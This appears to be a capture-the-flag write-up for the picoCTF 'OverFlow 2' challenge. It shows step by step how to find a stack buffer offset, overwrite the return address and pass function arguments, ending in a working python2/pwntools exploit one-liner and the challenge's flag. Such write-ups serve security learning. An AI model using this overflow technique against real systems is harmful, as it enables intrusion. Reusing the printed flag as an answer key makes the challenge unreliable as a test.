OverFlow 2
Last updated
Was this helpful?
Last updated
Was this helpful?
Now try overwriting arguments. Can you get the flag from this program? You can find it in /problems/overflow-2_2_47d6bbdfb1ccd0d65a76e6cbe0935b0f on the shell server. Source.
Find the offset/padding
You can use the method described in with the cyclic
and cyclic_find
or you can use the following
Open vuln in with r2 ./vuln
Run aaaa
Run pdf @ sym.vuln
to get var int local_b8h @ ebp-0xb8
The 0xb8
is the buffer location so 4 more bytes are needed to get past the "saved ebp register"
So the offset is 0xb8+4
Run readelf -s vuln
to get the address of flag
: 0x080485e6
We can use p32
from pwntools to convert the hex addresses to little endian.
We need to pad out the second return address with 'a'*4
so that goes next in the payload
Now we can add the two function arguments in little endian using p32
Payload complete: python2 -c "from pwn import *; print 'a'*(0xb8+4)+p32(0x080485e6)+'a'*4+p32(0xDEADBEEF)+p32(0xC0DED00D)" | ./vuln
picoCTF{arg5_and_r3turn5ce5cf61a}